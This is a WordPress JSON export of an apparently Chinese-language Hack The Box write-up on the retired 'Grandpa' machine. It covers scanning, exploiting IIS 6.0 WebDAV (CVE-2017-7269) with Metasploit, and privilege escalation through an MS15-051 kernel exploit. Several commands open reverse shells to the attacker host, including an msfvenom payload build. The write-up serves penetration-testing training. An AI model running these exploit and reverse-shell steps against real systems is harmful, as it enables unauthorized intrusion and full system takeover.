{"id":177,"date":"2024-11-13T10:52:48","date_gmt":"2024-11-13T02:52:48","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=177"},"modified":"2024-11-13T10:52:48","modified_gmt":"2024-11-13T02:52:48","slug":"177","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/177\/","title":{"rendered":"HTB\u9776\u673a Grandpa \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.14<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.14 (10.10.10.14) 56(84) bytes of data.\n64 bytes from 10.10.10.14: icmp_seq=1 ttl=127 time=98.8 ms\n64 bytes from 10.10.10.14: icmp_seq=2 ttl=127 time=99.3 ms\n64 bytes from 10.10.10.14: icmp_seq=3 ttl=127 time=99.5 ms\n64 bytes from 10.10.10.14: icmp_seq=4 ttl=127 time=99.9 ms\n\n--- 10.10.10.14 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3302ms\nrtt min\/avg\/max\/mdev = 98.848\/99.371\/99.859\/0.360 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7684\u7f51\u7edc\u901a\u4fe1\u72b6\u6001\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Sun Oct  6 06:59:17 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_report.txt 10.10.10.14\nNmap scan report for 10.10.10.14\nHost is up (0.10s latency).\nNot shown: 65534 filtered tcp ports (no-response)\nPORT   STATE      SERVICE\n80\/tcp unfiltered http\n\n# Nmap done at Sun Oct  6 07:00:22 2024 -- 1 IP address (1 host up) scanned in 65.86 seconds<\/code><\/pre>\n<p>\u9776\u673a\u5f00\u653e\u4e86<code>1<\/code>\u4e2a<code>TCP<\/code>\u7aef\u53e3\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Sun Oct  6 07:06:40 2024 as: nmap -sS -sV -A -p 80 -oN .\/tcp_report.txt 10.10.10.14\nNmap scan report for 10.10.10.14\nHost is up (0.092s latency).\n\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    Microsoft IIS httpd 6.0\n|_http-server-header: Microsoft-IIS\/6.0\n|_http-title: Under Construction\n| http-webdav-scan: \n|   WebDAV type: Unknown\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\n|   Server Date: Sat, 05 Oct 2024 22:55:30 GMT\n|   Server Type: Microsoft-IIS\/6.0\n|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\n| http-methods: \n|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (90%)\nOS CPE: cpe:\/o:microsoft:windows_server_2003::sp1 cpe:\/o:microsoft:windows_server_2003::sp2 cpe:\/o:microsoft:windows_server_2008::sp2 cpe:\/o:microsoft:windows_xp::sp3 cpe:\/o:microsoft:windows_2000::sp4\nAggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (90%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (89%), Microsoft Windows 2003 SP2 (88%), Microsoft Windows XP SP3 (88%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (88%), Microsoft Windows XP SP2 or SP3 (86%), Microsoft Windows XP (85%), Microsoft Windows Server 2003 (85%), Microsoft Windows XP SP2 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   92.67 ms 10.10.14.1\n2   92.63 ms 10.10.10.14\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Oct  6 07:06:57 2024 -- 1 IP address (1 host up) scanned in 16.69 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Sun Oct  6 07:08:42 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.14\nNmap scan report for 10.10.10.14\nHost is up (0.093s latency).\nAll 65535 scanned ports on 10.10.10.14 are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Sun Oct  6 07:09:48 2024 -- 1 IP address (1 host up) scanned in 66.48 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u5927\u81f4\u4e3a<code>Windows Server 2003<\/code>\uff0c\u5e76\u5f00\u653e\u4e86\u5f00\u542f\u4e86<code>WebDAV<\/code>\u7684<code>IIS 6.0<\/code>\u670d\u52a1\u5668\uff0c\u652f\u6301\u5927\u91cf\u5371\u9669\u7684<code>HTTP<\/code>\u65b9\u6cd5\u3002<\/p>\n<hr \/>\n<h1>Web\u670d\u52a1\u63a2\u6d4b<\/h1>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/grandpa.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728170726076-f22cd2a2-fcc1-43fa-8ca0-2bfc59ed73e4.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4e3a<code>IIS<\/code>\u670d\u52a1\u5668\u7684\u9ed8\u8ba4<code>304<\/code>\u9875\u9762\u3002\u5c1d\u8bd5\u6293\u53d6\u8bf7\u6c42\u5305\u91cd\u653e\uff0c\u67e5\u770b\u6d41\u91cf\u7ec6\u8282\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728170858118-b6b83eb9-314c-4e67-a06b-056703f69cd7.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5982\u4e0b<code>HTTP<\/code>\u54cd\u5e94\u6807\u5934\uff1a<\/p>\n<pre><code class=\"language-plain\">X-Powered-By: ASP.NET<\/code><\/pre>\n<p>\u5224\u65ad\u670d\u52a1\u5668\u53ef\u4ee5\u89e3\u6790<code>ASP.NET<\/code>\u8bed\u8a00\u3002<\/p>\n<p>\u901a\u8fc7\u67e5\u8be2\u6f0f\u6d1e\u5e93\uff0c\u8fd8\u53d1\u73b0<code>IIS 6.0<\/code>\u5b58\u5728\u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2017-7269<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728173433710-642eac6c-1947-4f59-ac9b-dcc6716e22b8.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>IIS 6.0\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u542f\u52a8<code>Metasploit<\/code>\uff0c\u6839\u636e<code>CVE<\/code>\u7f16\u53f7\u641c\u7d22\u653b\u51fb\u6a21\u5757\uff1a<\/p>\n<pre><code class=\"language-plain\">search CVE-2017-7269<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728173580388-e6c9a575-c8bc-4009-848b-b40bd0e0f6eb.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u641c\u7d22\u5230\u653b\u51fb\u6a21\u5757\uff0c\u6267\u884c\u5982\u4e0b\u6307\u4ee4\u8bbe\u7f6e\u6a21\u5757\u653b\u51fb\u53c2\u6570\uff1a<\/p>\n<pre><code class=\"language-shell\">use 0\nset payload payload\/windows\/shell\/reverse_tcp\nset RHOSTS 10.10.10.14\nset LHOST 10.10.14.5\nset LPORT 443<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728173932171-f118f646-9029-40da-a29c-83424b07d1da.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u6267\u884c<code>run<\/code>\u547d\u4ee4\u653b\u51fb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728174049530-a71e1c02-b7a5-4c3c-a104-2eac2d086625.png\" alt=\"\" \/><\/p>\n<p><strong>\u653b\u51fb\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u5185\u6838\u6f0f\u6d1e\u67e5\u8be2<\/h2>\n<p>\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u5c06\u8be6\u7ec6\u7cfb\u7edf\u4fe1\u606f\u4fdd\u5b58\u81f3\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">systeminfo &gt; .sysinfo.txt<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528<code>Windows Exploit Suggester 2<\/code>\u67e5\u8be2\u7cfb\u7edf\u6f0f\u6d1e\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728174946507-bf6fec99-5aec-4287-a60d-1361c2d8725b.png\" alt=\"\" \/><\/p>\n<p>\u51b3\u5b9a\u901a\u8fc7<code>MS15-051<\/code>\u6f0f\u6d1e\u8fdb\u884c\u63d0\u6743\u3002<\/p>\n<h2>MS15-051\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728<code>GitHub<\/code>\u4e0a\u4e0b\u8f7d<code>MS15-051<\/code>\u6f0f\u6d1e\u7684<code>EXP<\/code>\u7a0b\u5e8f\uff1a<a href=\"https:\/\/raw.githubusercontent.com\/SecWiki\/windows-kernel-exploits\/refs\/heads\/master\/MS15-051\/ms15-051.zip\" target=\"_blank\"  rel=\"nofollow\" >windows-kernel-exploits\/MS15-051 at master \u00b7 SecWiki\/windows-kernel-exploits \u00b7 GitHub<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728177726920-4547e1fd-c42c-4c55-8f7e-2ed1ee16eaf0.png\" alt=\"\" \/><\/p>\n<p>\u5728\u4f7f\u7528\u8be5\u7a0b\u5e8f\u524d\uff0c\u9996\u5148\u9700\u8981\u83b7\u53d6\u4e00\u4e2a<code>MeterPreter<\/code>\u4f1a\u8bdd\uff0c\u968f\u540e\u4f7f\u7528<code>migrate<\/code>\u547d\u4ee4\u5c06\u5f53\u524d\u8fdb\u7a0b\u8fc1\u79fb\u5230\u7a33\u5b9a\u7684\u8fdb\u7a0b\u5185\uff1a<\/p>\n<pre><code class=\"language-shell\">migrate 2304<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728177870173-6413f886-71b8-45e5-ade8-7112fcc761a6.png\" alt=\"\" \/><\/p>\n<p>\u5f53\u524d\u8fc1\u79fb\u5230\u4e86<code>davcdata.exe<\/code>\u8fdb\u7a0b\u5185\u3002<\/p>\n<p>\u968f\u540e\u4f7f\u7528<code>upload<\/code>\u4e0a\u4f20<code>EXP<\/code>\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-shell\">upload .\/ms15-051.exe<\/code><\/pre>\n<p>\u63a5\u7740\u5c1d\u8bd5\u6267\u884c<code>whoami<\/code>\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-shell\">.ms15-051.exe \"whoami\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728178149433-709b2b72-d844-4fe0-82ee-e2c0c8259b91.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\u4f7f\u7528\u8be5\u7a0b\u5e8f\u63d0\u6743\uff01\uff01\uff01\uff01<\/strong><\/p>\n<p>\u73b0\u5728\u9700\u8981\u4e0a\u4f20\u53cd\u5f39Shell\u7a0b\u5e8f\uff0c\u5e76\u4f7f\u7528\u653b\u51fb\u7a0b\u5e8f\u6267\u884c\uff08\u9700\u8981\u91cd\u65b0\u542f\u52a8\u4e00\u4e2a<code>MSF<\/code>\u76d1\u542c\uff09\uff1a<\/p>\n<pre><code class=\"language-shell\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o reverse.exe\nupload .\/reverse.exe\nshell\n.ms15-051.exe \".reverse.exe\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728180075254-7beaa9a2-bec5-434e-98c8-835495f36bcd.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728180278734-556e3044-42e1-4c4f-b315-32536d8e946a.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.14 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.14 (10.10.10.14)  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13,1],"tags":[],"class_list":["post-177","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/177","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=177"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/177\/revisions"}],"predecessor-version":[{"id":178,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/177\/revisions\/178"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=177"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=177"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=177"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}